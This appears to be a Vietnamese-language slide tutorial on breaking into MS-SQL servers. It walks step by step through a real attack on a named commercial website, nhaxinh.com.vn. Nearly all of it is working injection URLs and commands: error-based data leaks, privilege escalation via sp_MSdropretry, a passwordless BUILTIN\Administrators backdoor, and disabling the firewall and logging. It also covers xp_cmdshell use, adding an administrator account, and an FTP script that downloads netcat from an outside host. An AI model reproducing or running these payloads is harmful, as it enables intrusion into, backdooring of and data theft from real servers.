Xâm nhập máy chủ Ms-Sql qua lỗi Sql-Injection & Cross-Database

Trang 1

Xâm nhập máy chủ Ms-Sql qua lỗi Sql-Injection & Cross-Database

trang này đã được đọc lần

PHẦN I: CÁC KĨ THUẬT HACK TRONG SQL

• sql-injection

• convert-magic

• cross-database

PHÁT HIỆN LỖI SQL-INJECTION

http://www.company.com/product/price.asp?id=1

select price from product where id=1

http://www.company.com/product/price.asp?id=1’

select price from product where id=1’

Unclosed quotation mark before the character string ‘

http://www.company.com/product/price.asp?id=[ ]

KĨ THUẬT CONVERT-MAGIC

http://wwww.company.com/product/price.asp?id=1 and 1=convert(int,@@version) sp_password select price from product where id=1 and 1=convert(int,@@version) sp_password

Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.623 (Intel X86) Nov 23 1998 21:08:09 Copyright (c) 1988-1998 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 3)' to a column of data type int

'sp_password' was found in the text of this event. The text has been replaced with this comment for security reasons

• @@servername, db_name(), system_user,

• ‘ “ ( )

LỖI CROSS-DATABASE CỦA MS-SQL

use testdatabase

create proc dbo.test as select * from master.dbo.sysxlogins

go

exec test

select * from master.dbo.sysxlogins

• sa == dbo

• db_owner có thể create & design các object của dbo

• SID của proc dbo.test == SID của master.dbo.sysxlogins

LỖI INJECTION CỦA MASTER SP_MSDROPRETRY

CREATE PROCEDURE sp_MSdropretry

(@tname sysname, @pname sysname)

as

declare @retcode int

/*

** To public

*/

Trang 2

exec ('drop table ' + @tname)

if @@ERROR <> 0 return(1)

exec ('drop procedure ' + @pname)

if @@ERROR <> 0 return(1)

return (0)

NÂNG QUYỀN QUA MASTER SP_MSDROPRETRY

exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers'

exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx'

exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx'

exec sp_executesql N'drop view dbo.test‘

drop table xx update sysusers set sid=0x01 where name='dbo' drop procedure xx

drop table xx update dbo.test set sid=0x01,roles=0x01 where name=guest drop table xx

• guest == db_owner của database master

PHẦN 2: MINH HỌA HACK SQL

• Khai thác lỗi sql-injection tại nhaxinh.com.vn

• Một số kinh nghiệm khi hack SQL

LỖI SQL-INJECTION TẠI NHAXINH.COM.VN

• dùng “proxy.ia2.marketscore.com:80” ðể tránh bị ghi nhật kí

http://www.nhaxinh.com.vn/FullStory.asp?id=1

http://www.nhaxinh.com.vn/FullStory.asp?id=1’

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBCSQLServerDriver] [SQLServer]

Unclosed quotation mark before the character string ''

/Including/general.asp, line 840\

XÁC ĐỊNH VERSION

http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@version)

[Microsoft][ODBC SQL Server Driver][SQL Server]

[SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright (c) 1988-2002 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int

/Including/general.asp, line 840

XÁC ĐỊNH SERVER_NAME

http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@servername)

Trang 3

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UNESCO' to a column of data type int

http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,db_name())

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'NhaXinh' to a column of data type int

http://www.nhaxinh.com.vn/FullStory.asp?

id=1 and 1=convert(int,system_user)

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'nhaxinh' to a column of data type int

• user_name(): các member của “sysadmin” được map sang “dbo”

XÁC ĐỊNH MỨC QUYỀN CỦA SQL SERVER

http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')

[Microsoft][ODBC SQL Server Driver][SQL Server] Ad hoc access to OLE DB provider 'sqloledb' has been denied You must access this provider through a linked server

• admin đã disable openrowset/sqloledb, sẽ enable lại sau

ĐƯA GUEST VÀO DB_OWNER CỦA DATABASE MASTER1

http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx' exec sp_executesql N'drop view dbo.test'

• Tại sao? guest là db_owner của database master nên guest có thể thi hành xp_regwrite hoặc xp_cmdshell

XÁC NHẬN GUEST ĐÃ NẰM TRONG DB_OWNER CỦA DATABASE MASTER CHƯA ?

http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 name from master sysusers where roles=0x01 and name not in('dbo')))

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'guest' to a column of data type int

CÀI CỬA SAU “BUILTIN\ADMINISTRATORS”

http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysxlogins' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set xstatus=18 where name=''BUILTIN\ADMINISTRATORS''','xx' exec

Trang 4

sp_executesql N'drop view dbo.test'

• login vào database với username là “BUILTIN\ADMINISTRATORS” mà không cần password

TẠI SAO KHÔNG ADD THẲNG USER “NHAXINH” VÀO SYSADMIN?

exec master sp_addsrvrolemember 'nhaxinh',sysadmin

• Lỗi: Invalid object name ‘XXXX’ khi vấn tin CSDL sau này

ENABLE OPENROWSET/OLEDB & XÁC ĐỊNH LẠI MỨC QUYỀN CỦA SQL SERVER

http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master xp_regwrite

HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\

SQLOLEDB','AllowInProcess',REG_DWORD,1 exec master xp_regwrite HKEY_LOCAL_MACHINE,'SOFTWARE\ Microsoft\MSSQLServer\Providers\SQLOLEDB','DisallowAdhocAccess',REG_DWORD,0—

http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')

Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'SYSTEM'

DISABLE FIREWALL CỦA NT & TẮT LOG TRONG SQL

http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master xp_regdeletevalue

'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters'—

http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master xp_regdeletevalue

'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters'— LỖI KHI ENABLE MASTER XP_CMDSHELL & “ALLOW UPDATES”

http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb',

'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off exec master sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')—

[Microsoft][ODBC SQL Server Driver][SQL Server]Could not process object 'set fmtonly off

master sp_addextendedproc xp_cmd 'xpsql70.dll' exec sp_configure 'allow updates', '1' reconfigure with override' The OLE DB provider 'sqloledb' indicates that the object has no columns

THÊM DÒNG “SELECT 1” ĐỂ KHẮC PHỤC LỖI

'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec

master sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')

Trang 5

• set “allow updates”=1 cho phép update các “system-table” (sysusers, syslogins, ) trực tiếp, không qua các “system-procedure”

CHÚ Ý KHI CHẠY MASTER XP_CMDSHELL

• exec master xp_cmdshell ‘dir c:\’ “SQLAgentCmdExec”

• select * from openrowset('sqloledb', 'server=<SERVER_NAME>;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master xp_cmdshell "dir c:\"') “NT AUTHORITY\SYSTEM”

XÁC ĐỊNH IP CỦA SERVER

http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master xp_cmdshell 'ipconfig'

http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 b from t where b like '%25IP Address%25')) (%25 == “%”)

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP

Address : 203.162.7.70 ' to a column of data type int

DO THÁM IP “203.162.7.70”

C:\> ping 203.162.7.70

Pinging 203.162.7.70 with 32 bytes of data:

Reply from 203.162.7.70: bytes=32 time=232ms TTL=118

C:\> ftp 203.162.7.70

Connected to 203.162.7.70

220 unesco Microsoft FTP Service (Version 5.0)

User (203.162.7.70:(none)):

• 203.162.7.70 == panvietnam.com

FTP TRỰC TIẾP - THẤT BẠI !

'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec xp_cmdshell "net user

a /add %26 net localgroup administrators a /add"') (%26 == “&”)

C:\> ftp 203.162.7.70

Connected to 203.162.7.70

220 unesco Microsoft FTP Service

(Version 5.0)

User (203.162.7.70:(none)): a

331 Password required for a

Password:

530 User a cannot log in

Login failed

ftp> bye

Trang 6

UPLOAD NETCAT LÊN SERVER

'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master xp_cmdshell

"echo open a.b.c.d %3Ef %26 echo user a a %3E%3Ef %26 echo bin %3E%3Ef %26 echo cd a %3E%3Ef

%26 echo mget * %3E%3Ef %26 echo quit %3E%3Ef %26 ftp -v -i -n -s%3Af" %26 del f') (%3E ==

“>”)

echo open a.b.c.d >f

echo user a a >>f

echo bin >> f

echo cd a >>f

echo mget * >>f

echo quit >>f

ftp -v -i -n -s:f

del f

THẨM TRA XEM NETCAT ĐÃ ĐƯỢC UPLOAD THÀNH CÔNG CHƯA ?

http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master xp_cmdshell 'dir nx.exe'

http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=1))

http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=6))—

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '08/17/2003 11:31a 11,776 nx.exe' to a column of data type int

Tiêu đề	Xâm nhập máy chủ Ms-Sql qua lỗi Sql-Injection & Cross-Database
Trường học	University of Information Technology
Chuyên ngành	Information Security
Thể loại	Bài luận
Thành phố	Ho Chi Minh City

Định dạng
Số trang	6
Dung lượng	45 KB